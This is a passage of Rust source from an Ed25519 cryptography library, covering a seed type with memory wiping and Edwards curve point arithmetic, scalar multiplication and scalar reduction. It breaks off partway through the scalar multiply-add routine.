#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct Seed([u8; Seed::BYTES]);
impl From<[u8; 32]> for Seed {
fn from(seed: [u8; 32]) -> Self {
Seed(seed)
}
}
impl Seed {
/// Number of raw bytes in a seed.
pub const BYTES: usize = 32;
/// Creates a seed from raw bytes.
pub fn new(seed: [u8; Seed::BYTES]) -> Self {
Seed(seed)
}
/// Creates a seed from a slice.
pub fn from_slice(seed: &[u8]) -> Result<Self, Error> {
let mut seed_ = [0u8; Seed::BYTES];
if seed.len() != seed_.len() {
return Err(Error::InvalidSeed);
}
seed_.copy_from_slice(seed);
Ok(Seed::new(seed_))
}
/// Tentatively overwrite the content of the seed with zeros.
pub fn wipe(self) {
let mut seed = self;
Mem::wipe(&mut seed.0)
}
/// Overwrite the content of the seed with zeros in-place.
pub fn wipe_mut(&mut self) {
Mem::wipe(&mut self.0)
}
}
#[cfg(feature = "random")]
impl Default for Seed {
/// Generates a random seed.
fn default() -> Self {
let mut seed = [0u8; Seed::BYTES];
getrandom::fill(&mut seed).expect("RNG failure");
Seed(seed)
}
}
#[cfg(feature = "random")]
impl Seed {
/// Generates a random seed.
pub fn generate() -> Self {
Seed::default()
}
}
impl Deref for Seed {
type Target = [u8; Seed::BYTES];
/// Returns a seed as raw bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for Seed {
/// Returns a seed as mutable raw bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
pub(crate) struct Mem;
impl Mem {
#[inline]
pub fn wipe<T: Default>(x: &mut [T]) {
for i in 0..x.len() {
unsafe {
ptr::write_volatile(x.as_mut_ptr().add(i), T::default());
}
}
atomic::compiler_fence(atomic::Ordering::SeqCst);
atomic::fence(atomic::Ordering::SeqCst);
}
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/edwards25519.rs | src/edwards25519.rs | use core::cmp::min;
use core::ops::{Add, Sub};
use super::error::*;
use super::field25519::*;
#[derive(Clone, Copy)]
pub struct GeP2 {
x: Fe,
y: Fe,
z: Fe,
}
#[derive(Clone, Copy)]
pub struct GeP3 {
x: Fe,
y: Fe,
z: Fe,
t: Fe,
}
#[derive(Clone, Copy, Default)]
pub struct GeP1P1 {
x: Fe,
y: Fe,
z: Fe,
t: Fe,
}
#[derive(Clone, Copy)]
pub struct GePrecomp {
y_plus_x: Fe,
y_minus_x: Fe,
xy2d: Fe,
}
#[derive(Clone, Copy, Default)]
pub struct GeCached {
y_plus_x: Fe,
y_minus_x: Fe,
z: Fe,
t2d: Fe,
}
impl GeCached {
pub fn maybe_set(&mut self, other: &GeCached, do_swap: u8) {
self.y_plus_x.maybe_set(&other.y_plus_x, do_swap);
self.y_minus_x.maybe_set(&other.y_minus_x, do_swap);
self.z.maybe_set(&other.z, do_swap);
self.t2d.maybe_set(&other.t2d, do_swap);
}
}
impl GeP1P1 {
fn to_p2(&self) -> GeP2 {
GeP2 {
x: self.x * self.t,
y: self.y * self.z,
z: self.z * self.t,
}
}
fn to_p3(&self) -> GeP3 {
GeP3 {
x: self.x * self.t,
y: self.y * self.z,
z: self.z * self.t,
t: self.x * self.y,
}
}
}
impl From<GeP2> for GeP3 {
fn from(p: GeP2) -> GeP3 {
GeP3 {
x: p.x,
y: p.y,
z: p.z,
t: p.x * p.y,
}
}
}
impl GeP2 {
fn zero() -> GeP2 {
GeP2 {
x: FE_ZERO,
y: FE_ONE,
z: FE_ONE,
}
}
fn dbl(&self) -> GeP1P1 {
let xx = self.x.square();
let yy = self.y.square();
let b = self.z.square_and_double();
let a = self.x + self.y;
let aa = a.square();
let y3 = yy + xx;
let z3 = yy - xx;
let x3 = aa - y3;
let t3 = b - z3;
GeP1P1 {
x: x3,
y: y3,
z: z3,
t: t3,
}
}
fn slide(a: &[u8]) -> [i8; 256] {
let mut r = [0i8; 256];
for i in 0..256 {
r[i] = (1 & (a[i >> 3] >> (i & 7))) as i8;
}
for i in 0..256 {
if r[i] != 0 {
for b in 1..min(7, 256 - i) {
if r[i + b] != 0 {
if r[i] + (r[i + b] << b) <= 15 {
r[i] += r[i + b] << b;
r[i + b] = 0;
} else if r[i] - (r[i + b] << b) >= -15 {
r[i] -= r[i + b] << b;
for k in i + b..256 {
if r[k] == 0 {
r[k] = 1;
break;
}
r[k] = 0;
}
} else {
break;
}
}
}
}
}
r
}
#[allow(clippy::comparison_chain)]
pub fn double_scalarmult_vartime(a_scalar: &[u8], a_point: GeP3, b_scalar: &[u8]) -> GeP2 {
let aslide = GeP2::slide(a_scalar);
let bslide = GeP2::slide(b_scalar);
let mut ai = [GeCached {
y_plus_x: FE_ZERO,
y_minus_x: FE_ZERO,
z: FE_ZERO,
t2d: FE_ZERO,
}; 8]; // A,3A,5A,7A,9A,11A,13A,15A
ai[0] = a_point.to_cached();
let a2 = a_point.dbl().to_p3();
ai[1] = (a2 + ai[0]).to_p3().to_cached();
ai[2] = (a2 + ai[1]).to_p3().to_cached();
ai[3] = (a2 + ai[2]).to_p3().to_cached();
ai[4] = (a2 + ai[3]).to_p3().to_cached();
ai[5] = (a2 + ai[4]).to_p3().to_cached();
ai[6] = (a2 + ai[5]).to_p3().to_cached();
ai[7] = (a2 + ai[6]).to_p3().to_cached();
let mut r = GeP2::zero();
let mut i: usize = 255;
loop {
if aslide[i] != 0 || bslide[i] != 0 {
break;
}
if i == 0 {
return r;
}
i -= 1;
}
loop {
let mut t = r.dbl();
if aslide[i] > 0 {
t = t.to_p3() + ai[(aslide[i] / 2) as usize];
} else if aslide[i] < 0 {
t = t.to_p3() - ai[(-aslide[i] / 2) as usize];
}
if bslide[i] > 0 {
t = t.to_p3() + BI[(bslide[i] / 2) as usize];
} else if bslide[i] < 0 {
t = t.to_p3() - BI[(-bslide[i] / 2) as usize];
}
r = t.to_p2();
if i == 0 {
return r;
}
i -= 1;
}
}
}
impl GeP3 {
pub fn from_bytes_negate_vartime(s: &[u8; 32]) -> Option<GeP3> {
let y = Fe::from_bytes(s);
let z = FE_ONE;
let y_squared = y.square();
let u = y_squared - FE_ONE;
let v = (y_squared * FE_D) + FE_ONE;
let mut x = (u * v).pow25523() * u;
let vxx = x.square() * v;
let check = vxx - u;
if !check.is_zero() {
let check2 = vxx + u;
if !check2.is_zero() {
return None;
}
x = x * FE_SQRTM1;
}
if x.is_negative() == ((s[31] >> 7) != 0) {
x = x.neg();
}
let t = x * y;
Some(GeP3 { x, y, z, t })
}
pub fn from_bytes_vartime(s: &[u8; 32]) -> Option<GeP3> {
Self::from_bytes_negate_vartime(s).map(|p| GeP3 {
x: p.x.neg(),
y: p.y,
z: p.z,
t: p.t.neg(),
})
}
fn to_p2(&self) -> GeP2 {
GeP2 {
x: self.x,
y: self.y,
z: self.z,
}
}
fn to_cached(&self) -> GeCached {
GeCached {
y_plus_x: self.y + self.x,
y_minus_x: self.y - self.x,
z: self.z,
t2d: self.t * FE_D2,
}
}
fn zero() -> GeP3 {
GeP3 {
x: FE_ZERO,
y: FE_ONE,
z: FE_ONE,
t: FE_ZERO,
}
}
fn dbl(&self) -> GeP1P1 {
self.to_p2().dbl()
}
pub fn to_bytes(&self) -> [u8; 32] {
let recip = self.z.invert();
let x = self.x * recip;
let y = self.y * recip;
let mut bs = y.to_bytes();
bs[31] ^= (if x.is_negative() { 1 } else { 0 }) << 7;
bs
}
pub fn has_small_order(&self) -> bool {
let recip = self.z.invert();
let x = self.x * recip;
let y = self.y * recip;
let x_neg = x.neg();
let y_sqrtm1 = y * FE_SQRTM1;
x.is_zero() | y.is_zero() | (y_sqrtm1 == x) | (y_sqrtm1 == x_neg)
}
}
impl Add<GeP3> for GeP3 {
type Output = GeP3;
fn add(self, other: GeP3) -> GeP3 {
(self + other.to_cached()).to_p3()
}
}
impl Sub<GeP3> for GeP3 {
type Output = GeP3;
fn sub(self, other: GeP3) -> GeP3 {
(self - other.to_cached()).to_p3()
}
}
impl Add<GeCached> for GeP3 {
type Output = GeP1P1;
fn add(self, _rhs: GeCached) -> GeP1P1 {
let y1_plus_x1 = self.y + self.x;
let y1_minus_x1 = self.y - self.x;
let a = y1_plus_x1 * _rhs.y_plus_x;
let b = y1_minus_x1 * _rhs.y_minus_x;
let c = _rhs.t2d * self.t;
let zz = self.z * _rhs.z;
let d = zz + zz;
let x3 = a - b;
let y3 = a + b;
let z3 = d + c;
let t3 = d - c;
GeP1P1 {
x: x3,
y: y3,
z: z3,
t: t3,
}
}
}
impl Add<GePrecomp> for GeP3 {
type Output = GeP1P1;
fn add(self, _rhs: GePrecomp) -> GeP1P1 {
let y1_plus_x1 = self.y + self.x;
let y1_minus_x1 = self.y - self.x;
let a = y1_plus_x1 * _rhs.y_plus_x;
let b = y1_minus_x1 * _rhs.y_minus_x;
let c = _rhs.xy2d * self.t;
let d = self.z + self.z;
let x3 = a - b;
let y3 = a + b;
let z3 = d + c;
let t3 = d - c;
GeP1P1 {
x: x3,
y: y3,
z: z3,
t: t3,
}
}
}
impl Sub<GeCached> for GeP3 {
type Output = GeP1P1;
fn sub(self, _rhs: GeCached) -> GeP1P1 {
let y1_plus_x1 = self.y + self.x;
let y1_minus_x1 = self.y - self.x;
let a = y1_plus_x1 * _rhs.y_minus_x;
let b = y1_minus_x1 * _rhs.y_plus_x;
let c = _rhs.t2d * self.t;
let zz = self.z * _rhs.z;
let d = zz + zz;
let x3 = a - b;
let y3 = a + b;
let z3 = d - c;
let t3 = d + c;
GeP1P1 {
x: x3,
y: y3,
z: z3,
t: t3,
}
}
}
impl Sub<GePrecomp> for GeP3 {
type Output = GeP1P1;
fn sub(self, _rhs: GePrecomp) -> GeP1P1 {
let y1_plus_x1 = self.y + self.x;
let y1_minus_x1 = self.y - self.x;
let a = y1_plus_x1 * _rhs.y_minus_x;
let b = y1_minus_x1 * _rhs.y_plus_x;
let c = _rhs.xy2d * self.t;
let d = self.z + self.z;
let x3 = a - b;
let y3 = a + b;
let z3 = d - c;
let t3 = d + c;
GeP1P1 {
x: x3,
y: y3,
z: z3,
t: t3,
}
}
}
fn ge_precompute(base: &GeP3) -> [GeCached; 16] {
let base_cached = base.to_cached();
let mut pc = [GeP3::zero(); 16];
pc[1] = *base;
for i in 2..16 {
pc[i] = if i % 2 == 0 {
pc[i / 2].dbl().to_p3()
} else {
pc[i - 1].add(base_cached).to_p3()
}
}
let mut pc_cached: [GeCached; 16] = Default::default();
for i in 0..16 {
pc_cached[i] = pc[i].to_cached();
}
pc_cached
}
pub fn ge_scalarmult(scalar: &[u8], base: &GeP3) -> GeP3 {
let pc = ge_precompute(base);
let mut q = GeP3::zero();
let mut pos = 252;
loop {
let slot = ((scalar[pos >> 3] >> (pos & 7)) & 15) as usize;
let mut t = pc[0];
for i in 1..16 {
t.maybe_set(&pc[i], (((slot ^ i).wrapping_sub(1)) >> 8) as u8 & 1);
}
q = q.add(t).to_p3();
if pos == 0 {
break;
}
q = q.dbl().to_p3().dbl().to_p3().dbl().to_p3().dbl().to_p3();
pos -= 4;
}
q
}
pub fn ge_scalarmult_base(scalar: &[u8]) -> GeP3 {
const BXP: [u8; 32] = [
0x1a, 0xd5, 0x25, 0x8f, 0x60, 0x2d, 0x56, 0xc9, 0xb2, 0xa7, 0x25, 0x95, 0x60, 0xc7, 0x2c,
0x69, 0x5c, 0xdc, 0xd6, 0xfd, 0x31, 0xe2, 0xa4, 0xc0, 0xfe, 0x53, 0x6e, 0xcd, 0xd3, 0x36,
0x69, 0x21,
];
const BYP: [u8; 32] = [
0x58, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66,
0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66,
0x66, 0x66,
];
let bx = Fe::from_bytes(&BXP);
let by = Fe::from_bytes(&BYP);
let base = GeP3 {
x: bx,
y: by,
z: FE_ONE,
t: bx * by,
};
ge_scalarmult(scalar, &base)
}
#[cfg(feature = "x25519")]
pub fn ge_to_x25519_vartime(s: &[u8; 32]) -> Option<[u8; 32]> {
let p = GeP3::from_bytes_vartime(s)?;
let yed = p.y;
let x_mont = (FE_ONE + yed) * ((FE_ONE - yed).invert());
Some(x_mont.to_bytes())
}
pub fn sc_reduce32(s: &mut [u8; 32]) {
let mut t = [0u8; 64];
t[0..32].copy_from_slice(s);
sc_reduce(&mut t);
s.copy_from_slice(&t[0..32]);
}
pub fn sc_reduce(s: &mut [u8]) {
let mut s0: i64 = 2097151 & load_3i(s);
let mut s1: i64 = 2097151 & (load_4i(&s[2..6]) >> 5);
let mut s2: i64 = 2097151 & (load_3i(&s[5..8]) >> 2);
let mut s3: i64 = 2097151 & (load_4i(&s[7..11]) >> 7);
let mut s4: i64 = 2097151 & (load_4i(&s[10..14]) >> 4);
let mut s5: i64 = 2097151 & (load_3i(&s[13..16]) >> 1);
let mut s6: i64 = 2097151 & (load_4i(&s[15..19]) >> 6);
let mut s7: i64 = 2097151 & (load_3i(&s[18..21]) >> 3);
let mut s8: i64 = 2097151 & load_3i(&s[21..24]);
let mut s9: i64 = 2097151 & (load_4i(&s[23..27]) >> 5);
let mut s10: i64 = 2097151 & (load_3i(&s[26..29]) >> 2);
let mut s11: i64 = 2097151 & (load_4i(&s[28..32]) >> 7);
let mut s12: i64 = 2097151 & (load_4i(&s[31..35]) >> 4);
let mut s13: i64 = 2097151 & (load_3i(&s[34..37]) >> 1);
let mut s14: i64 = 2097151 & (load_4i(&s[36..40]) >> 6);
let mut s15: i64 = 2097151 & (load_3i(&s[39..42]) >> 3);
let mut s16: i64 = 2097151 & load_3i(&s[42..45]);
let mut s17: i64 = 2097151 & (load_4i(&s[44..48]) >> 5);
let s18: i64 = 2097151 & (load_3i(&s[47..50]) >> 2);
let s19: i64 = 2097151 & (load_4i(&s[49..53]) >> 7);
let s20: i64 = 2097151 & (load_4i(&s[52..56]) >> 4);
let s21: i64 = 2097151 & (load_3i(&s[55..58]) >> 1);
let s22: i64 = 2097151 & (load_4i(&s[57..61]) >> 6);
let s23: i64 = load_4i(&s[60..64]) >> 3;
s11 += s23 * 666643;
s12 += s23 * 470296;
s13 += s23 * 654183;
s14 -= s23 * 997805;
s15 += s23 * 136657;
s16 -= s23 * 683901;
s10 += s22 * 666643;
s11 += s22 * 470296;
s12 += s22 * 654183;
s13 -= s22 * 997805;
s14 += s22 * 136657;
s15 -= s22 * 683901;
s9 += s21 * 666643;
s10 += s21 * 470296;
s11 += s21 * 654183;
s12 -= s21 * 997805;
s13 += s21 * 136657;
s14 -= s21 * 683901;
s8 += s20 * 666643;
s9 += s20 * 470296;
s10 += s20 * 654183;
s11 -= s20 * 997805;
s12 += s20 * 136657;
s13 -= s20 * 683901;
s7 += s19 * 666643;
s8 += s19 * 470296;
s9 += s19 * 654183;
s10 -= s19 * 997805;
s11 += s19 * 136657;
s12 -= s19 * 683901;
s6 += s18 * 666643;
s7 += s18 * 470296;
s8 += s18 * 654183;
s9 -= s18 * 997805;
s10 += s18 * 136657;
s11 -= s18 * 683901;
let mut carry6: i64 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
let mut carry8: i64 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
let mut carry10: i64 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
let carry12: i64 = (s12 + (1 << 20)) >> 21;
s13 += carry12;
s12 -= carry12 << 21;
let carry14: i64 = (s14 + (1 << 20)) >> 21;
s15 += carry14;
s14 -= carry14 << 21;
let carry16: i64 = (s16 + (1 << 20)) >> 21;
s17 += carry16;
s16 -= carry16 << 21;
let mut carry7: i64 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
let mut carry9: i64 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
let mut carry11: i64 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
let carry13: i64 = (s13 + (1 << 20)) >> 21;
s14 += carry13;
s13 -= carry13 << 21;
let carry15: i64 = (s15 + (1 << 20)) >> 21;
s16 += carry15;
s15 -= carry15 << 21;
s5 += s17 * 666643;
s6 += s17 * 470296;
s7 += s17 * 654183;
s8 -= s17 * 997805;
s9 += s17 * 136657;
s10 -= s17 * 683901;
s4 += s16 * 666643;
s5 += s16 * 470296;
s6 += s16 * 654183;
s7 -= s16 * 997805;
s8 += s16 * 136657;
s9 -= s16 * 683901;
s3 += s15 * 666643;
s4 += s15 * 470296;
s5 += s15 * 654183;
s6 -= s15 * 997805;
s7 += s15 * 136657;
s8 -= s15 * 683901;
s2 += s14 * 666643;
s3 += s14 * 470296;
s4 += s14 * 654183;
s5 -= s14 * 997805;
s6 += s14 * 136657;
s7 -= s14 * 683901;
s1 += s13 * 666643;
s2 += s13 * 470296;
s3 += s13 * 654183;
s4 -= s13 * 997805;
s5 += s13 * 136657;
s6 -= s13 * 683901;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
let mut carry0: i64 = (s0 + (1 << 20)) >> 21;
s1 += carry0;
s0 -= carry0 << 21;
let mut carry2: i64 = (s2 + (1 << 20)) >> 21;
s3 += carry2;
s2 -= carry2 << 21;
let mut carry4: i64 = (s4 + (1 << 20)) >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry6 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry8 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry10 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
let mut carry1: i64 = (s1 + (1 << 20)) >> 21;
s2 += carry1;
s1 -= carry1 << 21;
let mut carry3: i64 = (s3 + (1 << 20)) >> 21;
s4 += carry3;
s3 -= carry3 << 21;
let mut carry5: i64 = (s5 + (1 << 20)) >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry7 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry9 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry11 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
carry0 = s0 >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry1 = s1 >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry2 = s2 >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry3 = s3 >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry4 = s4 >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry5 = s5 >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry6 = s6 >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry7 = s7 >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry8 = s8 >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry9 = s9 >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry10 = s10 >> 21;
s11 += carry10;
s10 -= carry10 << 21;
carry11 = s11 >> 21;
s12 += carry11;
s11 -= carry11 << 21;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
carry0 = s0 >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry1 = s1 >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry2 = s2 >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry3 = s3 >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry4 = s4 >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry5 = s5 >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry6 = s6 >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry7 = s7 >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry8 = s8 >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry9 = s9 >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry10 = s10 >> 21;
s11 += carry10;
s10 -= carry10 << 21;
s[0] = (s0 >> 0) as u8;
s[1] = (s0 >> 8) as u8;
s[2] = ((s0 >> 16) | (s1 << 5)) as u8;
s[3] = (s1 >> 3) as u8;
s[4] = (s1 >> 11) as u8;
s[5] = ((s1 >> 19) | (s2 << 2)) as u8;
s[6] = (s2 >> 6) as u8;
s[7] = ((s2 >> 14) | (s3 << 7)) as u8;
s[8] = (s3 >> 1) as u8;
s[9] = (s3 >> 9) as u8;
s[10] = ((s3 >> 17) | (s4 << 4)) as u8;
s[11] = (s4 >> 4) as u8;
s[12] = (s4 >> 12) as u8;
s[13] = ((s4 >> 20) | (s5 << 1)) as u8;
s[14] = (s5 >> 7) as u8;
s[15] = ((s5 >> 15) | (s6 << 6)) as u8;
s[16] = (s6 >> 2) as u8;
s[17] = (s6 >> 10) as u8;
s[18] = ((s6 >> 18) | (s7 << 3)) as u8;
s[19] = (s7 >> 5) as u8;
s[20] = (s7 >> 13) as u8;
s[21] = (s8 >> 0) as u8;
s[22] = (s8 >> 8) as u8;
s[23] = ((s8 >> 16) | (s9 << 5)) as u8;
s[24] = (s9 >> 3) as u8;
s[25] = (s9 >> 11) as u8;
s[26] = ((s9 >> 19) | (s10 << 2)) as u8;
s[27] = (s10 >> 6) as u8;
s[28] = ((s10 >> 14) | (s11 << 7)) as u8;
s[29] = (s11 >> 1) as u8;
s[30] = (s11 >> 9) as u8;
s[31] = (s11 >> 17) as u8;
}
#[cfg(feature = "blind-keys")]
pub fn sc_mul(a: &[u8], b: &[u8]) -> [u8; 32] {
let mut s = [0u8; 32];
sc_muladd(&mut s, a, b, &[0; 32]);
s
}
#[cfg(feature = "blind-keys")]
pub fn sc_sq(s: &[u8]) -> [u8; 32] {
sc_mul(s, s)
}
#[cfg(feature = "blind-keys")]
pub fn sc_sqmul(s: &[u8], n: usize, a: &[u8]) -> [u8; 32] {
let mut t = [0u8; 32];
t.copy_from_slice(s);
for _ in 0..n {
t = sc_sq(&t);
}
sc_mul(&t, a)
}
#[cfg(feature = "blind-keys")]
pub fn sc_invert(s: &[u8; 32]) -> [u8; 32] {
let _10 = sc_sq(s);
let _11 = sc_mul(s, &_10);
let _100 = sc_mul(s, &_11);
let _1000 = sc_sq(&_100);
let _1010 = sc_mul(&_10, &_1000);
let _1011 = sc_mul(s, &_1010);
let _10000 = sc_sq(&_1000);
let _10110 = sc_sq(&_1011);
let _100000 = sc_mul(&_1010, &_10110);
let _100110 = sc_mul(&_10000, &_10110);
let _1000000 = sc_sq(&_100000);
let _1010000 = sc_mul(&_10000, &_1000000);
let _1010011 = sc_mul(&_11, &_1010000);
let _1100011 = sc_mul(&_10000, &_1010011);
let _1100111 = sc_mul(&_100, &_1100011);
let _1101011 = sc_mul(&_100, &_1100111);
let _10010011 = sc_mul(&_1000000, &_1010011);
let _10010111 = sc_mul(&_100, &_10010011);
let _10111101 = sc_mul(&_100110, &_10010111);
let _11010011 = sc_mul(&_10110, &_10111101);
let _11100111 = sc_mul(&_1010000, &_10010111);
let _11101011 = sc_mul(&_100, &_11100111);
let _11110101 = sc_mul(&_1010, &_11101011);
let mut recip = sc_mul(&_1011, &_11110101);
recip = sc_sqmul(&recip, 126, &_1010011);
recip = sc_sqmul(&recip, 9, &_10);
recip = sc_mul(&recip, &_11110101);
recip = sc_sqmul(&recip, 7, &_1100111);
recip = sc_sqmul(&recip, 9, &_11110101);
recip = sc_sqmul(&recip, 11, &_10111101);
recip = sc_sqmul(&recip, 8, &_11100111);
recip = sc_sqmul(&recip, 9, &_1101011);
recip = sc_sqmul(&recip, 6, &_1011);
recip = sc_sqmul(&recip, 14, &_10010011);
recip = sc_sqmul(&recip, 10, &_1100011);
recip = sc_sqmul(&recip, 9, &_10010111);
recip = sc_sqmul(&recip, 10, &_11110101);
recip = sc_sqmul(&recip, 8, &_11010011);
recip = sc_sqmul(&recip, 8, &_11101011);
recip
}
pub fn sc_muladd(s: &mut [u8], a: &[u8], b: &[u8], c: &[u8]) {
let a0 = 2097151 & load_3i(&a[0..3]);
let a1 = 2097151 & (load_4i(&a[2..6]) >> 5);
let a2 = 2097151 & (load_3i(&a[5..8]) >> 2);
let a3 = 2097151 & (load_4i(&a[7..11]) >> 7);
let a4 = 2097151 & (load_4i(&a[10..14]) >> 4);
let a5 = 2097151 & (load_3i(&a[13..16]) >> 1);
let a6 = 2097151 & (load_4i(&a[15..19]) >> 6);
let a7 = 2097151 & (load_3i(&a[18..21]) >> 3);
let a8 = 2097151 & load_3i(&a[21..24]);
let a9 = 2097151 & (load_4i(&a[23..27]) >> 5);
let a10 = 2097151 & (load_3i(&a[26..29]) >> 2);
let a11 = load_4i(&a[28..32]) >> 7;
let b0 = 2097151 & load_3i(&b[0..3]);
let b1 = 2097151 & (load_4i(&b[2..6]) >> 5);
let b2 = 2097151 & (load_3i(&b[5..8]) >> 2);
let b3 = 2097151 & (load_4i(&b[7..11]) >> 7);
let b4 = 2097151 & (load_4i(&b[10..14]) >> 4);
let b5 = 2097151 & (load_3i(&b[13..16]) >> 1);
let b6 = 2097151 & (load_4i(&b[15..19]) >> 6);
let b7 = 2097151 & (load_3i(&b[18..21]) >> 3);
let b8 = 2097151 & load_3i(&b[21..24]);
let b9 = 2097151 & (load_4i(&b[23..27]) >> 5);
let b10 = 2097151 & (load_3i(&b[26..29]) >> 2);
let b11 = load_4i(&b[28..32]) >> 7;
let c0 = 2097151 & load_3i(&c[0..3]);
let c1 = 2097151 & (load_4i(&c[2..6]) >> 5);
let c2 = 2097151 & (load_3i(&c[5..8]) >> 2);
let c3 = 2097151 & (load_4i(&c[7..11]) >> 7);
let c4 = 2097151 & (load_4i(&c[10..14]) >> 4);
let c5 = 2097151 & (load_3i(&c[13..16]) >> 1);
let c6 = 2097151 & (load_4i(&c[15..19]) >> 6);
let c7 = 2097151 & (load_3i(&c[18..21]) >> 3);
let c8 = 2097151 & load_3i(&c[21..24]);
let c9 = 2097151 & (load_4i(&c[23..27]) >> 5);
let c10 = 2097151 & (load_3i(&c[26..29]) >> 2);
let c11 = load_4i(&c[28..32]) >> 7;
let mut s0: i64 = c0 + a0 * b0;
let mut s1: i64 = c1 + a0 * b1 + a1 * b0;
let mut s2: i64 = c2 + a0 * b2 + a1 * b1 + a2 * b0;
let mut s3: i64 = c3 + a0 * b3 + a1 * b2 + a2 * b1 + a3 * b0;
let mut s4: i64 = c4 + a0 * b4 + a1 * b3 + a2 * b2 + a3 * b1 + a4 * b0;
let mut s5: i64 = c5 + a0 * b5 + a1 * b4 + a2 * b3 + a3 * b2 + a4 * b1 + a5 * b0;
let mut s6: i64 = c6 + a0 * b6 + a1 * b5 + a2 * b4 + a3 * b3 + a4 * b2 + a5 * b1 + a6 * b0;
let mut s7: i64 =
c7 + a0 * b7 + a1 * b6 + a2 * b5 + a3 * b4 + a4 * b3 + a5 * b2 + a6 * b1 + a7 * b0;
let mut s8: i64 = c8
+ a0 * b8
+ a1 * b7
+ a2 * b6
+ a3 * b5
+ a4 * b4
+ a5 * b3
+ a6 * b2
+ a7 * b1
+ a8 * b0;
let mut s9: i64 = c9
+ a0 * b9
+ a1 * b8
+ a2 * b7
+ a3 * b6
+ a4 * b5
+ a5 * b4
+ a6 * b3
+ a7 * b2
+ a8 * b1
+ a9 * b0;
let mut s10: i64 = c10
+ a0 * b10
+ a1 * b9
+ a2 * b8
+ a3 * b7
+ a4 * b6
+ a5 * b5
+ a6 * b4
+ a7 * b3
+ a8 * b2
+ a9 * b1
+ a10 * b0;
let mut s11: i64 = c11
+ a0 * b11
+ a1 * b10
+ a2 * b9
+ a3 * b8
+ a4 * b7
+ a5 * b6
+ a6 * b5
+ a7 * b4
+ a8 * b3
+ a9 * b2
+ a10 * b1
+ a11 * b0;
let mut s12: i64 = a1 * b11
+ a2 * b10
+ a3 * b9
+ a4 * b8
+ a5 * b7
+ a6 * b6
+ a7 * b5
+ a8 * b4
+ a9 * b3
+ a10 * b2
+ a11 * b1;
let mut s13: i64 = a2 * b11
+ a3 * b10
+ a4 * b9
+ a5 * b8
+ a6 * b7
+ a7 * b6
+ a8 * b5
+ a9 * b4
+ a10 * b3
+ a11 * b2;
let mut s14: i64 =
a3 * b11 + a4 * b10 + a5 * b9 + a6 * b8 + a7 * b7 + a8 * b6 + a9 * b5 + a10 * b4 + a11 * b3;
let mut s15: i64 =
a4 * b11 + a5 * b10 + a6 * b9 + a7 * b8 + a8 * b7 + a9 * b6 + a10 * b5 + a11 * b4;
let mut s16: i64 = a5 * b11 + a6 * b10 + a7 * b9 + a8 * b8 + a9 * b7 + a10 * b6 + a11 * b5;
let mut s17: i64 = a6 * b11 + a7 * b10 + a8 * b9 + a9 * b8 + a10 * b7 + a11 * b6;
let mut s18: i64 = a7 * b11 + a8 * b10 + a9 * b9 + a10 * b8 + a11 * b7;
let mut s19: i64 = a8 * b11 + a9 * b10 + a10 * b9 + a11 * b8;
let mut s20: i64 = a9 * b11 + a10 * b10 + a11 * b9;
let mut s21: i64 = a10 * b11 + a11 * b10;
let mut s22: i64 = a11 * b11;
let mut s23: i64 = 0;
let mut carry0: i64 = (s0 + (1 << 20)) >> 21;
s1 += carry0;
